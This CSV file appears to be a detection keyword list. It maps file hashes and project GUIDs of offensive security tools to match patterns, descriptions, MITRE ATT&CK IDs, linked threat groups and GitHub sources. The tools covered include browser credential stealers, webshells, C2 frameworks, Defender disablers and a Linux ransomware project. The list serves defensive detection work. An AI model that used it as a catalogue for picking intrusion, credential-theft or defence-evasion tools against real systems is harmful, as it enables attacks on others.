"*7b39a858a51efa5160d65300b9b89695caf33ec380f69a40cdb7f742e8f05a46*",".{0,1000}7b39a858a51efa5160d65300b9b89695caf33ec380f69a40cdb7f742e8f05a46.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#filehash","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","29526"
"*7b41987489d49340783b4b6604899143c2c6c67f66708d80df217c509ff8b4dd*",".{0,1000}7b41987489d49340783b4b6604899143c2c6c67f66708d80df217c509ff8b4dd.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29528"
"*7b49173186a78fa01b47056b8a3304f8f8b9a8d83bf2a0a342fa2e5597d745fb*",".{0,1000}7b49173186a78fa01b47056b8a3304f8f8b9a8d83bf2a0a342fa2e5597d745fb.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29530"
"*7b4abcd75af76bf67bc0028fd42083c4dfb81f4b27ac3e7b54bacb16436165b4*",".{0,1000}7b4abcd75af76bf67bc0028fd42083c4dfb81f4b27ac3e7b54bacb16436165b4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29531"
"*7B4D3810-4A77-44A1-8546-779ACF02D083*",".{0,1000}7B4D3810\-4A77\-44A1\-8546\-779ACF02D083.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","#GUIDproject","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","29533"
"*7b519e14d5860852dd54139ef9bff6a52a5e400afc6cbd1b6d7bc2a75ed674e6*",".{0,1000}7b519e14d5860852dd54139ef9bff6a52a5e400afc6cbd1b6d7bc2a75ed674e6.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","29534"
"*7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d*",".{0,1000}7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29536"
"*7b5b75b4087cb25515ce661dc7ad5be184faf4f3a03173f895e6f275ad18380e*",".{0,1000}7b5b75b4087cb25515ce661dc7ad5be184faf4f3a03173f895e6f275ad18380e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29537"
"*7b6b043f894bb0f34244c9cb88dc1cf801d16010817d51fe7c1f6be2af6b91bf*",".{0,1000}7b6b043f894bb0f34244c9cb88dc1cf801d16010817d51fe7c1f6be2af6b91bf.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","29540"
"*7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764*",".{0,1000}7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29542"
"*7b80732e0860de10d83b01b2071e96614b18ae9ed5642b8aaa829e37f3145201*",".{0,1000}7b80732e0860de10d83b01b2071e96614b18ae9ed5642b8aaa829e37f3145201.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29545"
"*7b81753062ad8adcc3012d1e1f78c6cbb5d8937e61a51f09a9d649bd153b0d03*",".{0,1000}7b81753062ad8adcc3012d1e1f78c6cbb5d8937e61a51f09a9d649bd153b0d03.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29546"
"*7b8eebc200136f58a721bb5112df41c3af8ca87ed505e07787610d3d8e7775d9*",".{0,1000}7b8eebc200136f58a721bb5112df41c3af8ca87ed505e07787610d3d8e7775d9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29548"
"*7b8f9e66368aa0606e480ca7b8c62cbbd2fc9ff726630f46ed45aa45e7786e62*",".{0,1000}7b8f9e66368aa0606e480ca7b8c62cbbd2fc9ff726630f46ed45aa45e7786e62.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29549"
"*7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b*",".{0,1000}7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29550"
"*7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b*",".{0,1000}7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29551"
"*7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b*",".{0,1000}7b95cdf2630b4e94b8d09bf430308f54487e88928e63bda7a94a75255755809b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29552"
"*7b97e3bd5491fc4a6c4a29b77dd36682e1bc7969a1ed8cb9abd4c1d4819eb00e*",".{0,1000}7b97e3bd5491fc4a6c4a29b77dd36682e1bc7969a1ed8cb9abd4c1d4819eb00e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29553"
"*7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667*",".{0,1000}7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29554"
"*7ba905e8e4cba64f1df56bb1498c21193c9f02a36d86294c761f53bafaadded6*",".{0,1000}7ba905e8e4cba64f1df56bb1498c21193c9f02a36d86294c761f53bafaadded6.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29556"
"*7bb549f48f1f33ad7f2494b078459ddd2a70c39ccc34a6edf3c0b9cd5efc9031*",".{0,1000}7bb549f48f1f33ad7f2494b078459ddd2a70c39ccc34a6edf3c0b9cd5efc9031.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","29557"
"*7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a*",".{0,1000}7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","29559"
"*7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c*",".{0,1000}7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","29560"
"*7bcabfc6777e1141b116e4595e113148fca5c89fb5f8eb8c4fec519f91e483b8*",".{0,1000}7bcabfc6777e1141b116e4595e113148fca5c89fb5f8eb8c4fec519f91e483b8.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","29561"
"*7BCD7440-845C-417B-8C2F-AA89D3AE8FD0*",".{0,1000}7BCD7440\-845C\-417B\-8C2F\-AA89D3AE8FD0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29562"
"*7bcebf955c725d8d50ee161d523e06891dadb93fb98fc9fe74a1056c374c767c*",".{0,1000}7bcebf955c725d8d50ee161d523e06891dadb93fb98fc9fe74a1056c374c767c.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29563"
"*7bd1a6f777a6e86907b0b3bf24cf013bb419a4fe24b9e0b2af23fce70d823c29*",".{0,1000}7bd1a6f777a6e86907b0b3bf24cf013bb419a4fe24b9e0b2af23fce70d823c29.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29564"
"*7bd2ca96a2c189f15784e3a8294218b5760fb56e32e7fc5d29fbca0453a9185c*",".{0,1000}7bd2ca96a2c189f15784e3a8294218b5760fb56e32e7fc5d29fbca0453a9185c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29565"
"*7be230cab89ef568b598e64885fe315c8983f300167a21b8279cc94cb99317a0*",".{0,1000}7be230cab89ef568b598e64885fe315c8983f300167a21b8279cc94cb99317a0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29567"
"*7be59deb0b1db3b7898139b7f5575ddedd5ed91e964bdb54546bb3bfd6d3eec1*",".{0,1000}7be59deb0b1db3b7898139b7f5575ddedd5ed91e964bdb54546bb3bfd6d3eec1.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29570"
"*7be8dfa044e5b3d190e18fba93418c2d30648b35f9aadc3702a11d048b430d71*",".{0,1000}7be8dfa044e5b3d190e18fba93418c2d30648b35f9aadc3702a11d048b430d71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29571"
"*7be934c8e901153ea188a5003414ea2d18a47f8f404792a27448e383fc1a5e28*",".{0,1000}7be934c8e901153ea188a5003414ea2d18a47f8f404792a27448e383fc1a5e28.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29572"
"*7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b*",".{0,1000}7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","29573"
"*7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa*",".{0,1000}7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","29574"
"*7bf1a774419d2b7c7dc3d1d61802494c5b6c1a2a9e0512f2a9993c73f41aeaa1*",".{0,1000}7bf1a774419d2b7c7dc3d1d61802494c5b6c1a2a9e0512f2a9993c73f41aeaa1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29575"
"*7bf6b6be-a29f-440a-9962-9fabc5d9665a*",".{0,1000}7bf6b6be\-a29f\-440a\-9962\-9fabc5d9665a.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#GUIDproject","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","29577"
"*7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022*",".{0,1000}7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29578"
"*7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1*",".{0,1000}7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29579"
"*7c1d37a17c8b71a2c58e28251bef0baee7b06757764e5979daf7f1185a9696bb*",".{0,1000}7c1d37a17c8b71a2c58e28251bef0baee7b06757764e5979daf7f1185a9696bb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29581"
"*7c20345b30b2db97967812965d5a90ba34424cc481d073914d016e2541494f6f*",".{0,1000}7c20345b30b2db97967812965d5a90ba34424cc481d073914d016e2541494f6f.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","29582"
"*7c2c0aec-7b9d-4104-99fa-1844d609452c*",".{0,1000}7c2c0aec\-7b9d\-4104\-99fa\-1844d609452c.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#GUIDproject","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","29585"
"*7c37604dd86dc2ce14b352c8df0c4230ab3a1887ef73349806b0e7c15025843c*",".{0,1000}7c37604dd86dc2ce14b352c8df0c4230ab3a1887ef73349806b0e7c15025843c.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","#filehash","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","29586"
"*7c3c428effecb086e266482a9d18a622aa939ae380be734ab844c38aedc19a5d*",".{0,1000}7c3c428effecb086e266482a9d18a622aa939ae380be734ab844c38aedc19a5d.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","29587"
"*7c3c699693507772f6c20be4e9caa31b74b7bf87bf6b7db9f3293c51de05b801*",".{0,1000}7c3c699693507772f6c20be4e9caa31b74b7bf87bf6b7db9f3293c51de05b801.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29588"
"*7C3D26E5-0A61-479A-AFAC-D34F2659F301*",".{0,1000}7C3D26E5\-0A61\-479A\-AFAC\-D34F2659F301.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#GUIDproject","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","29589"
"*7c40428f6a5c9b8bc70387d5c9dfa173a47095f89e517b3fc0595807477b56f4*",".{0,1000}7c40428f6a5c9b8bc70387d5c9dfa173a47095f89e517b3fc0595807477b56f4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29591"
"*7c43dca2c565e2c362c1085358213802a55f05d911560b689bbd138225e8d6d7*",".{0,1000}7c43dca2c565e2c362c1085358213802a55f05d911560b689bbd138225e8d6d7.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","29593"
"*7c45771cd7dab73930cec33123a0073e96f50ec035e5b4e3774d3b188441b481*",".{0,1000}7c45771cd7dab73930cec33123a0073e96f50ec035e5b4e3774d3b188441b481.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29594"
"*7c4650646cf661efd5ad7dc45f6237f6aa0cc28e81163ce1e3a7b86841cbd5f8*",".{0,1000}7c4650646cf661efd5ad7dc45f6237f6aa0cc28e81163ce1e3a7b86841cbd5f8.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","29595"
"*7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6*",".{0,1000}7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29596"
"*7c564e21d505b73cfb26be1cc3fefc72a78787e8ff4dddca0d1fd7923e00add8*",".{0,1000}7c564e21d505b73cfb26be1cc3fefc72a78787e8ff4dddca0d1fd7923e00add8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29599"
